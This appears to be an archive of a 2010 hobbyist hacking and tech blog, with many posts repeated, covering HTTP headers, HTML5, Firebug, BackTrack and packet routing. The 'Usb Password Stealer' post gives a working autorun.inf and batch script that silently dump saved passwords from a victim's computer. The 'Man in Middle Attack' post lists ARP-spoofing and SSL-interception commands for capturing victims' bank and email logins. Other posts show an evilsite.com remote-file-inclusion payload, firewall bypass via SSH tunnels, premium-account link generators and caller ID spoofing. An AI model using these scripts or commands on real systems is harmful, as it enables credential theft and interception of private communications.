Dedicated to my juniors who ask me many times that “How to run Torrent behind proxy n firewall??” or “Sir please unblock Torrent over institue lan.”
Torrents is preferred means of downloads. Use of BitTorrent is not possible on some networks (e.g. institute or office lan). In this post am going to tell you a easy solution to overcome this problem. By using a secure connection (SSH), you can bypass almost every firewall. Linux or a UNIX-based OS terminal supports SSH. For Windows, you have to download SSH clients. There are may SSH clients, but PUTTY is (probably) the best and certainly the most popular. For this hack you need a SSH account. You can try one of these free shell providers from this list . So here it goes….
Steps:
1. Run putty and In the address box, put the hostname or IP address of the server you have an SSH account on. Make sure the SSH radio button or check-box is ticked, and be sure you’re using port 22.
2. In the menu, click on Proxy tab under Connections and put your proxy settings there.
3. In the menu, click on SSH and select enable compression. this will compress the traffic thru your SSH tunnel, which not only provides a modest improvement in transfer rates, but has some minor security benefits as well. Set your preferred protocol to “2″, or “2 only”.
4. Click on the tunnels menu under SSH. At the bottom, select the dynamic button, and enter a source port. Use any port (greater than 1024 like 4567). Click the “add” button.
5. Go back to the session tab in the menu, enter in a title for this proxy, and click save.
6. Now Configure your BitTorrent client. In uTorrent go to Options > Preferences > Connection. Enter your port number (which u use earlier like 4567), socks 4 or 5 as type, and localhost in the proxy field. Socks5 is preferable to version four, and supported by our SSH tunnel, so select it. Click OK, and you should now be proxying thru the server with the SSH account.
You’re done, restart your BitTorrent client and you’re ready to go. BitTorrent over SSH tends to be a bit slower than your normal connection, but it’s a great solution when BitTorrent connections are blocked.
Saturday, June 26, 2010
Friday, June 25, 2010
Customize start menu button: Windows 7
Have you ever wondered how to customize the start menu button in Windows 7? Well it is possible to spice up your copy of Windows 7 by giving a new look to the start menu button. In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a binary editor. Resource HackerTM is a freeware utility and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP, Vista and Windows7 operating systems.
Requirements
1. Resource Hacker: A Binary File Editor
2. Custom Start Menu Images: You nees three images that must be of the size 54×162 with a .bmp extension.
1st Image – For idle state
2nd Image – For mouse over
3rd Image – When button is clicked
Process:
1. Run Resource Hacker Editor.
2. Go to File menu and Open file “explorer.exe” into the Resource Hacker.
3. Go to Bitmap branch, expand 6801 option, right-click on 1033 and select Replace Resource option.
4. A new window appears. Click on Open file with new bitmap button.
5. Navigate to the customized (.bmp) image, open it and click on Replace button.
6. Repeat steps 3 to 5 above for the options 6805 and 6809 as well.
7. Now save the file. Resource Hacker will automatically create a backup file called explorer_original.exe so that you can restore it in the future if needed. Restart your computer and have fun.
Download Resource Hacker Tool from http://www.angusj.com/resourcehacker/
Requirements
1. Resource Hacker: A Binary File Editor
2. Custom Start Menu Images: You nees three images that must be of the size 54×162 with a .bmp extension.
1st Image – For idle state
2nd Image – For mouse over
3rd Image – When button is clicked
Process:
1. Run Resource Hacker Editor.
2. Go to File menu and Open file “explorer.exe” into the Resource Hacker.
3. Go to Bitmap branch, expand 6801 option, right-click on 1033 and select Replace Resource option.
4. A new window appears. Click on Open file with new bitmap button.
5. Navigate to the customized (.bmp) image, open it and click on Replace button.
6. Repeat steps 3 to 5 above for the options 6805 and 6809 as well.
7. Now save the file. Resource Hacker will automatically create a backup file called explorer_original.exe so that you can restore it in the future if needed. Restart your computer and have fun.
Download Resource Hacker Tool from http://www.angusj.com/resourcehacker/
Tuesday, June 22, 2010
Usb Password Stealer
Many people save their passwords in their Browser and windows. As we know that there are lots of tools available on internet to recover Saved passwords, Thus one can easily run those software at victim’s computer and get their’s passwords. With the help of USB Passwords Stealer one can easily steal that saved passwords from victim’s computer.
Requirements:
Password recovery software:
1. Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc
2. IE Passview – IE passview is a small program that helps us view stored passwords in Internet explorer.
3. Protected storage pass viewer(PSPV) – Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
4. Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
Steps:
1. Download all these tools and copy their exe files (mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe) into your USB Drive.
2. Open notepad and write the following command into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this file as autorun.inf and copy it into your USB drive.
3. Open another notepad and write the following command into it.
@echo off
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save this file as launch.bat and copy it into your USB drive.
4. Its done now insert it in victims computer and this will save password in .txt files for you.
Requirements:
Password recovery software:
1. Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc
2. IE Passview – IE passview is a small program that helps us view stored passwords in Internet explorer.
3. Protected storage pass viewer(PSPV) – Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
4. Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
Steps:
1. Download all these tools and copy their exe files (mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe) into your USB Drive.
2. Open notepad and write the following command into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this file as autorun.inf and copy it into your USB drive.
3. Open another notepad and write the following command into it.
@echo off
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save this file as launch.bat and copy it into your USB drive.
4. Its done now insert it in victims computer and this will save password in .txt files for you.
Monday, June 21, 2010
Premium Link Generator
I think all of us are regular user of Rapidshare and Megauplaod ,famous file sharing websites. Everytime when we want to download we have to wait for certain amount of time untill the download link appears. In case of Rapidshare, if your ip is already downloading some files from their server then you have to wait for the time period untill that download finished. Thus you might want to get yourself a premium account to avoid waiting every time you download files from it. Unfortunately, we don’t have money or don’t have will to buy premium account. Specially kids and teenagers who don’t own credit cards are not able to purchase a premium account.
Thus here are some link that genrate premium account for you so that you can download files easily.
http://rapid8.com/
http://www.rapidtime.net/
http://rapidshare-premium-link-generator.com/
http://premiumrapidshare.net/rapidshare.php
http://www.youleech.net/
http://www.hellorapid.com/public/index.php
To see how Rapidshare, Megaupload Premium Link Generator works visit link
If you have a Rapidshare premium account, you can also set up a generator for others using the source code provided on internet. I’m not sure if it’s legal though, so use at your own risk.
Thus here are some link that genrate premium account for you so that you can download files easily.
http://rapid8.com/
http://www.rapidtime.net/
http://rapidshare-premium-link-generator.com/
http://premiumrapidshare.net/rapidshare.php
http://www.youleech.net/
http://www.hellorapid.com/public/index.php
To see how Rapidshare, Megaupload Premium Link Generator works visit link
If you have a Rapidshare premium account, you can also set up a generator for others using the source code provided on internet. I’m not sure if it’s legal though, so use at your own risk.
Saturday, June 19, 2010
HTTP Headers
In HTTP protocol, client(also referred as a user agent) submits HTTP requests to the server by sending messages to it. The server sends messages back to the client in HTTP response. Both HTTP requests and HTTP responses use headers to send information about the HTTP message. A header is a series of lines, with each line containing a name followed by a colon and a space, and then a value. The fields can be arranged in any order. Some header fields are used in both request and response headers, while others are appropriate only for either a request or a response.
Many request header fields will allow the client to specify several acceptable options in the value part and, in some cases, even rank each option’s preference. Multiple items are separated using a comma. For example, a client could send a request header that includes “Content-Encoding: gzip, compress,” indicating it would accept either type of compression. If the server uses gzip encoding for the response body, its response header would include “Content-Encoding: gzip“. One can add his own field in HTTP headers so that it contains some value specified by user. Some fields can occur more than once in a single header. For example, a header can have multiple “Warning” fields.
In most the the hacking contest you will find atleast one question on HTTP headers. Information can be hidden in them. To clear that level you have to see and edit the HTTP headers fields. There are lots of softwares/addons available on the net that make it possible to see and edit HTTP header.
Some firefox addon: Firebug, Add and Modify Headers, Live HTTP headers
For more information regarding HTTP headers fields and their values please visit http://en.wikipedia.org/wiki/HTTP
Many request header fields will allow the client to specify several acceptable options in the value part and, in some cases, even rank each option’s preference. Multiple items are separated using a comma. For example, a client could send a request header that includes “Content-Encoding: gzip, compress,” indicating it would accept either type of compression. If the server uses gzip encoding for the response body, its response header would include “Content-Encoding: gzip“. One can add his own field in HTTP headers so that it contains some value specified by user. Some fields can occur more than once in a single header. For example, a header can have multiple “Warning” fields.
In most the the hacking contest you will find atleast one question on HTTP headers. Information can be hidden in them. To clear that level you have to see and edit the HTTP headers fields. There are lots of softwares/addons available on the net that make it possible to see and edit HTTP header.
Some firefox addon: Firebug, Add and Modify Headers, Live HTTP headers
For more information regarding HTTP headers fields and their values please visit http://en.wikipedia.org/wiki/HTTP
Friday, June 18, 2010
BackTrack : one-stop-shop for hackers
Whether you are hacking wireless, exploiting servers, learning, performing a web application assessment, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs. BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.
The evolution of BackTrack spans many years of development, penetration tests, and unprecedented help from the security community. BackTrack originally started with earlier versions of live Linux distributions called Whoppix, IWHAX, and Auditor. When BackTrack was developed, it was designed to be an all in one live cd used on security audits and was specifically crafted to not leave any remnants of itself on the laptop. It has since expanded to being the most widely adopted penetration testing framework in existence and is used by the security community all over the world.
Offensive Security has announced the release of BackTrack 4, an Ubuntu-based live DVD containing a large collection of tools for security audits, computer forensics and penetration testing: “BackTrack 4 final is out and along with this release come some exciting news, updates, and developments. BackTrack 4 has been a long and steady road, with the release of a beta last year, we decided to hold off on releasing BackTrack 4 final until it was perfected in every way, shape and form. This release includes a new kernel, a larger and expanded toolset repository, custom tools that you can only find on BackTrack, and more importantly, fixes to all major bugs that we knew of. This release has received an overwhelming support from the community and we are grateful to everyone who has contributed to the success of this release.”
Name of some tools that are included in BackTrack
1. Metasploit integration
2. RFMON Injection capable wireless drivers
3. Kismet
4. AutoScan-Network
5. Nmap
6. Ettercap
7. Wireshark (formerly known as Ethereal)
8. BeEF (Browser Exploitation Framework)
Download BackTrack
For more information about BackTrack visit their website.
The evolution of BackTrack spans many years of development, penetration tests, and unprecedented help from the security community. BackTrack originally started with earlier versions of live Linux distributions called Whoppix, IWHAX, and Auditor. When BackTrack was developed, it was designed to be an all in one live cd used on security audits and was specifically crafted to not leave any remnants of itself on the laptop. It has since expanded to being the most widely adopted penetration testing framework in existence and is used by the security community all over the world.
Offensive Security has announced the release of BackTrack 4, an Ubuntu-based live DVD containing a large collection of tools for security audits, computer forensics and penetration testing: “BackTrack 4 final is out and along with this release come some exciting news, updates, and developments. BackTrack 4 has been a long and steady road, with the release of a beta last year, we decided to hold off on releasing BackTrack 4 final until it was perfected in every way, shape and form. This release includes a new kernel, a larger and expanded toolset repository, custom tools that you can only find on BackTrack, and more importantly, fixes to all major bugs that we knew of. This release has received an overwhelming support from the community and we are grateful to everyone who has contributed to the success of this release.”
Name of some tools that are included in BackTrack
1. Metasploit integration
2. RFMON Injection capable wireless drivers
3. Kismet
4. AutoScan-Network
5. Nmap
6. Ettercap
7. Wireshark (formerly known as Ethereal)
8. BeEF (Browser Exploitation Framework)
Download BackTrack
For more information about BackTrack visit their website.
Thursday, June 17, 2010
Tele Spoofing
Caller ID spoofing: It is the practice of causing the telephone network to display a number on the recipient’s caller ID display which is not that of the actual originating station; the term is commonly used to describe situations in which the motivation is considered vicious by the speaker. Caller ID is spoofed through a variety of methods and different technology. The most popular ways of spoofing Caller ID are through the use of Voice over IP or PRI lines. Just as e-mail spoofing can make it appear that a message came from any e-mail address the sender chooses, caller ID spoofing can make a call appear to have come from any phone number the caller wishes.
SMS spoofing: SMS spoofing technology which uses the short message service (SMS), available on most mobile phones and personal digital assistants, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text. SMS Spoofing occurs when a sender manipulates address information. Often it is done in order to impersonate a user that has roamed onto a foreign network and is submitting messages to the home network.
To use a typical service, the customer dials from any phone the toll free number given to them by some service provider and enters their PIN. They are then asked to enter the number they wish to call and the number they wish to appear on the caller ID. Once the “customer” selects the options, the call is then bridged and the person on the other end assumes someone else is calling them.
It is now possible to spoof (or change) the Caller id in India. CrazyCall is the ultimate tool for making prank calls and fooling your friends. You can change your CallerID, so when you call someone he sees on his Caller ID display the number you selected. You can also change the pitch of your voice for deep and creepy or high and funny.
How is it done: ( I didn’t try this till now so try it your own risk )
1. Select the country you are calling from, choose the CallerID you want to display and enter the number you want to call. Press “Get me a code” and we will provide you with number to call and a code.
2. Call the number
3. Enter the code and we will connect your call to your friend with the CallerID and voice you have selected.
SMS spoofing: SMS spoofing technology which uses the short message service (SMS), available on most mobile phones and personal digital assistants, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text. SMS Spoofing occurs when a sender manipulates address information. Often it is done in order to impersonate a user that has roamed onto a foreign network and is submitting messages to the home network.
To use a typical service, the customer dials from any phone the toll free number given to them by some service provider and enters their PIN. They are then asked to enter the number they wish to call and the number they wish to appear on the caller ID. Once the “customer” selects the options, the call is then bridged and the person on the other end assumes someone else is calling them.
It is now possible to spoof (or change) the Caller id in India. CrazyCall is the ultimate tool for making prank calls and fooling your friends. You can change your CallerID, so when you call someone he sees on his Caller ID display the number you selected. You can also change the pitch of your voice for deep and creepy or high and funny.
How is it done: ( I didn’t try this till now so try it your own risk )
1. Select the country you are calling from, choose the CallerID you want to display and enter the number you want to call. Press “Get me a code” and we will provide you with number to call and a code.
2. Call the number
3. Enter the code and we will connect your call to your friend with the CallerID and voice you have selected.
Tuesday, June 15, 2010
Remote File Inclusion
Malicious file execution vulnerabilities are found in many applications. When the data is insufficiently checked, this can lead to arbitrary remote and hostile content being included, processed or invoked by the web server. All web application frameworks are vulnerable to malicious file execution if they accept filenames or files from the user. PHP is particularly vulnerable to remote file include (RFI) attack through parameter tampering with any file or streams based API. Remote file inclusion, commonly known as RFI is a form of attack where the attacker tries to inject their own php code inside your’s php application. If an attacker got success in that he will be able to execute any code on your webserver.
Suppose we have a website that take varialbe like page=abc.htm to work out which page should be displayed.
Code:
$filename =$_GET['page'];
include($filename);
above code shows that whatever is passed to the page will get included. What will happen if the attacker passes the url like this “http://www.hissite.com/index.php?page=http://www.evilsite.com/evil.txt?”. The actual code that the web server is executing looks like this if attacker passes that url.
Code:
$filename =$_GET['page'];
//$filename has value “http://www.evilsite.com/evil.txt?”;
include($filename);
Thus attacker is able to get his code executed on webserver. The attacker includes a .txt file and not a .php file because if the script was a .php then script will get executed on the attackers server and not on target. Attacker also add the “?” at the end so anything that might be inside the include() function on the target server, is removed.
Example Code:
$filename =$_GET['page'];
include($filename .”.php”);
The above code add .php to in filename passed to it. So if we passed it “http://www.evilsite.com/evil.txt” then include() function actaully have “http://www.evilsite.com/evil.txt.php”.
In general, a well-written application will not use user-supplied input in any filename for any server-based resource, However, many legacy applications will continue to have a need to accept user supplied input. This kind of attack can be stoped by a performing simple checks on the data.
Suppose we have a website that take varialbe like page=abc.htm to work out which page should be displayed.
Code:
$filename =$_GET['page'];
include($filename);
above code shows that whatever is passed to the page will get included. What will happen if the attacker passes the url like this “http://www.hissite.com/index.php?page=http://www.evilsite.com/evil.txt?”. The actual code that the web server is executing looks like this if attacker passes that url.
Code:
$filename =$_GET['page'];
//$filename has value “http://www.evilsite.com/evil.txt?”;
include($filename);
Thus attacker is able to get his code executed on webserver. The attacker includes a .txt file and not a .php file because if the script was a .php then script will get executed on the attackers server and not on target. Attacker also add the “?” at the end so anything that might be inside the include() function on the target server, is removed.
Example Code:
$filename =$_GET['page'];
include($filename .”.php”);
The above code add .php to in filename passed to it. So if we passed it “http://www.evilsite.com/evil.txt” then include() function actaully have “http://www.evilsite.com/evil.txt.php”.
In general, a well-written application will not use user-supplied input in any filename for any server-based resource, However, many legacy applications will continue to have a need to accept user supplied input. This kind of attack can be stoped by a performing simple checks on the data.
Sunday, June 13, 2010
Man in Middle Attack
Secure Sockets Layer (SSL) provides a secure communication channel between two peers. I am not going to discuss here that “How SSL works”. For that visit the link .This attack talks about HTTPS only. In case of HTTPS the user has usually possibility to decide whether to accept the certificate represented to her/him or not. Together with the lack of client peer authentication this opens possibility to man-in-the-middle attack which is a widely known feature of SSL. The attacker can fake the server to the client and create two secure channels, one to the client and one to the server.
Prerequisites
Any Spoofing Software: In man-in-the-middle attacks the attacker have to redirect the client’s communication to himself. Thus you need a software that has the feature of spoofing to implement the redirection.
Webmitm: As the communication is encrypted an active relay tool is required as simple TCP forwarding is not enough.
Ssldump: To decrypt data-packet that comes to your computer.
Note: Use Backtrack Operating System that has all tools installed already. This OS is designed specially for security and hacking purpose. The command that are used in this tutorial is also based on this OS but one can use this connect for any OS.
Attack Preparation:
Step 1. Turn on the ip forwarding so that packet will not drop on your computer.
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2. There should be some rule that will be follwed by firewall, if they are not add these entries in your firewall.
iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
Step 3. Spoof the victim’s computer so that data-packet routes through your computer instead of victim’s default gateway.
arpspoof -t “Victim’s ip” “Your ip”
Step 4. Turn on the webmitm
webmitm -d
Step5. Run ssldump so that it decrypt the log file for ssl entries.
ssldump -n -d -k webmitm.crt | tee ssldump.log
Now all you do is wait for the victim to log into google/gmail/yahoo/msn/hotmail or any other https connection, even a bank and you will see the passwords pop up in the terminal.
Prerequisites
Any Spoofing Software: In man-in-the-middle attacks the attacker have to redirect the client’s communication to himself. Thus you need a software that has the feature of spoofing to implement the redirection.
Webmitm: As the communication is encrypted an active relay tool is required as simple TCP forwarding is not enough.
Ssldump: To decrypt data-packet that comes to your computer.
Note: Use Backtrack Operating System that has all tools installed already. This OS is designed specially for security and hacking purpose. The command that are used in this tutorial is also based on this OS but one can use this connect for any OS.
Attack Preparation:
Step 1. Turn on the ip forwarding so that packet will not drop on your computer.
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2. There should be some rule that will be follwed by firewall, if they are not add these entries in your firewall.
iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
Step 3. Spoof the victim’s computer so that data-packet routes through your computer instead of victim’s default gateway.
arpspoof -t “Victim’s ip” “Your ip”
Step 4. Turn on the webmitm
webmitm -d
Step5. Run ssldump so that it decrypt the log file for ssl entries.
ssldump -n -d -k webmitm.crt | tee ssldump.log
Now all you do is wait for the victim to log into google/gmail/yahoo/msn/hotmail or any other https connection, even a bank and you will see the passwords pop up in the terminal.
Data Transmission over Internet
There are lots of queries from my juniors regarding “How data packets are transmitted over intenet”. I tried my best to solve their queries. I hope there are more juniors who want to ask the same question but not able to contact me. So here it goes…
When you type any URL(Universal Resource Locator ) in addressbar of your browser like (www.techpandit.in into your browser’s URL area) and hit Return, the browser tells the Transport Layer that it wants to establish a connection and passes the URL down. The first thing happen is- Browser runs the DNS client that made the first packet (User Datagram Protocol packet) to go down the stack with a destination port of 53(DNS port) to the ip-address of your Domain Name Server (Packet gets the ip-address of DNS server by your’s ip settings) to request the IP address of www.techpandit.in
As soon as the IP address for the website is returned, the transport layer initiates a Transfer Control Protocol (TCP) connection to the server on which website is hosted by sending a Synchronization (SYN) packet. The SYN packet proposed following values for the connection: Maximum Transmittable Unit, Maximum Segment Size and Receive Window. The server on which website is hosted will either accept or reject this SYN packet by transmitting a Synchronization Acknowledgement (SYN-ACK). If accepted, your PC will send one more SYN packet and the web page will start loading. If rejected, the SYN-ACK your computer receives will have the edited values for these fields listed. If your computer accepts the changes it will send another SYN packet and the transfer will start. If your computer cannot accept the new values another SYN packet will be transmitted by your computer to the web server with more changes – and the process continues until both sides agree, or the connection times out or is cancelled.
In this way you have a connection to the website and data is transmitting. Packets are being sent from the web server to your computer and the page is loading on your web browser. This process is looks simple but let’s see about what’s really happen behind it.
Whenever a data packet leaves computer it must have 6 fields: Source and Destination ip-address, Source and Destination mac-address and Source and Destination port no. As the data-packet moves down from the Application Layer each layer “wraps” the data in it. The Transport Layer adds a TCP or UDP header with a source and destination port number. The Internet Layer adds source and destination ip-address . The Network Layer adds source and destination mac-address (Medium Access Control). If you don’t have the mac-address of destination the destination mac-address fields contains the mac-address of yours default gateway. The packet is then transmitted over the network to another node on the same network in which you computer lies. It’s sent to the default gateway that you have configured in ip-settings if destination is not in the same network. You see, MAC addresses are used to communicate with devices that are on the same network. IP addresses are used to communicate with devices on different networks. So, the source and destination MAC address is constantly changing as a packet is routed across a network (or the Internet). The source and destination IP address remains the same.
On the receiving computer, each layer “unwraps” the package. The Network layer “unwraps” the Network Layer “packaging” by removing the source and destination MAC and then passes the packet to Internet Layer. The Internet Layer “unwraps” the Internet Layer packaging by removing the IP header (source and destination IP) and then passes the packet to the Transport Layer. The Transport layer removes the Transport Layer header and passes the data to the correct application determined by the destination port number.
When you type any URL(Universal Resource Locator ) in addressbar of your browser like (www.techpandit.in into your browser’s URL area) and hit Return, the browser tells the Transport Layer that it wants to establish a connection and passes the URL down. The first thing happen is- Browser runs the DNS client that made the first packet (User Datagram Protocol packet) to go down the stack with a destination port of 53(DNS port) to the ip-address of your Domain Name Server (Packet gets the ip-address of DNS server by your’s ip settings) to request the IP address of www.techpandit.in
As soon as the IP address for the website is returned, the transport layer initiates a Transfer Control Protocol (TCP) connection to the server on which website is hosted by sending a Synchronization (SYN) packet. The SYN packet proposed following values for the connection: Maximum Transmittable Unit, Maximum Segment Size and Receive Window. The server on which website is hosted will either accept or reject this SYN packet by transmitting a Synchronization Acknowledgement (SYN-ACK). If accepted, your PC will send one more SYN packet and the web page will start loading. If rejected, the SYN-ACK your computer receives will have the edited values for these fields listed. If your computer accepts the changes it will send another SYN packet and the transfer will start. If your computer cannot accept the new values another SYN packet will be transmitted by your computer to the web server with more changes – and the process continues until both sides agree, or the connection times out or is cancelled.
In this way you have a connection to the website and data is transmitting. Packets are being sent from the web server to your computer and the page is loading on your web browser. This process is looks simple but let’s see about what’s really happen behind it.
Whenever a data packet leaves computer it must have 6 fields: Source and Destination ip-address, Source and Destination mac-address and Source and Destination port no. As the data-packet moves down from the Application Layer each layer “wraps” the data in it. The Transport Layer adds a TCP or UDP header with a source and destination port number. The Internet Layer adds source and destination ip-address . The Network Layer adds source and destination mac-address (Medium Access Control). If you don’t have the mac-address of destination the destination mac-address fields contains the mac-address of yours default gateway. The packet is then transmitted over the network to another node on the same network in which you computer lies. It’s sent to the default gateway that you have configured in ip-settings if destination is not in the same network. You see, MAC addresses are used to communicate with devices that are on the same network. IP addresses are used to communicate with devices on different networks. So, the source and destination MAC address is constantly changing as a packet is routed across a network (or the Internet). The source and destination IP address remains the same.
On the receiving computer, each layer “unwraps” the package. The Network layer “unwraps” the Network Layer “packaging” by removing the source and destination MAC and then passes the packet to Internet Layer. The Internet Layer “unwraps” the Internet Layer packaging by removing the IP header (source and destination IP) and then passes the packet to the Transport Layer. The Transport layer removes the Transport Layer header and passes the data to the correct application determined by the destination port number.
Thursday, June 10, 2010
Hacking Tools : Top 5
1. Metasploit
The Metasploit Framework is both a penetration testing system and a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler. The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload. Hundreds of exploits and dozens of payload options are available.
For more information about it and download please visit http://www.metasploit.com/framework/
2. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Definataly we will have a blog about Wireshark later.
For more information about it and download please visit http://www.wireshark.org/
3. Cain and Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. Definataly we will have a blog about Cain and Abel later.
For more information about it and download please visit http://www.oxid.it/cain.html
4. Nmap
I think everyone has heard of this one. Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
For more information about it and download please visit http://www.insecure.org/nmap/download.html
5. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
For more information about it and download please visit http://www.openwall.com/john/
The Metasploit Framework is both a penetration testing system and a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler. The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload. Hundreds of exploits and dozens of payload options are available.
For more information about it and download please visit http://www.metasploit.com/framework/
2. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Definataly we will have a blog about Wireshark later.
For more information about it and download please visit http://www.wireshark.org/
3. Cain and Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. Definataly we will have a blog about Cain and Abel later.
For more information about it and download please visit http://www.oxid.it/cain.html
4. Nmap
I think everyone has heard of this one. Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
For more information about it and download please visit http://www.insecure.org/nmap/download.html
5. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
For more information about it and download please visit http://www.openwall.com/john/
Wednesday, June 9, 2010
HTML5 : An Introduction
Firefox, Safari, and Chrome support a few features outlined in it. Opera Mobile, Android browser and Safari for iPhone also support elements of it, Google’s Wave projects are depending on it, Chrome OS for netbooks relies on it for offline storage and most web developers are overjoyed about what it means. If you doesn’t know what i am talking about, So here it goes…
What is HTML5?
HTML5 is the next generation of HTML, superseding HTML 4.01, XHTML 1.0, and XHTML 1.1. HTML5, defines the 5th major revision of the core language of the World Wide Web: the Hypertext Markup Language. It provides new features that are necessary for modern web applications. It is a specification for how HTML, should be formatted and utilized to deliver text, images, multimedia, web apps, search forms, and anything else you see in your browser. HTML5 isn’t a software release, or a web development law. It’s a voted-upon and group-edited standard, written in broad fashion to accommodate different styles of development and the different thinking among web browser makers.
Flash, Silverlight, and other browser plug-ins are artificial solutions for a natural problem that HTML5 is trying to fix: Placing and managing interactive elements on a web page.
Features of HTML5
See HTML5 in action
http://apirocks.com/html5/html5.html#slide1
http://html5demos.com/
http://html5gallery.com/
Further for information regarding HTML5 please visit http://www.w3.org/TR/html5/
What is HTML5?
HTML5 is the next generation of HTML, superseding HTML 4.01, XHTML 1.0, and XHTML 1.1. HTML5, defines the 5th major revision of the core language of the World Wide Web: the Hypertext Markup Language. It provides new features that are necessary for modern web applications. It is a specification for how HTML, should be formatted and utilized to deliver text, images, multimedia, web apps, search forms, and anything else you see in your browser. HTML5 isn’t a software release, or a web development law. It’s a voted-upon and group-edited standard, written in broad fashion to accommodate different styles of development and the different thinking among web browser makers.
Flash, Silverlight, and other browser plug-ins are artificial solutions for a natural problem that HTML5 is trying to fix: Placing and managing interactive elements on a web page.
Features of HTML5
- Smarter forms
- Canvas drawing
- Offline storage
- Geolocation
- Native video and audio streaming support
See HTML5 in action
http://apirocks.com/html5/html5.html#slide1
http://html5demos.com/
http://html5gallery.com/
Further for information regarding HTML5 please visit http://www.w3.org/TR/html5/
Monday, June 7, 2010
Firefox Without Firebug : Never
Firebug is a free, open source tool that is available as a Mozilla Firefox extension. Some uses it regulary while others even don't know about it. So here it goes...
Firebug is an extension for Firefox that allows debugging, editing, and monitoring of any website's CSS, HTML, DOM, and JavaScript. It also allows performance analysis of a website. Furthermore, it has a JavaScript console for logging errors and watching values. Firebug simply makes it easier to develop websites/applications. It is one of the best web development extensions for Firefox. Firebug provides all the tools that a web developer needs to analyze, debug, and monitor JavaScript, CSS, HTML, and AJAX. It also includes a debugger, error console, command line, and a variety of useful inspectors.
Firebug capabilities
1. Inspect and edit HTML
2. Inspect and edit CSS and visualize CSS metrics
3. Use a performance tuning application
4. Profile and debug JavaScript
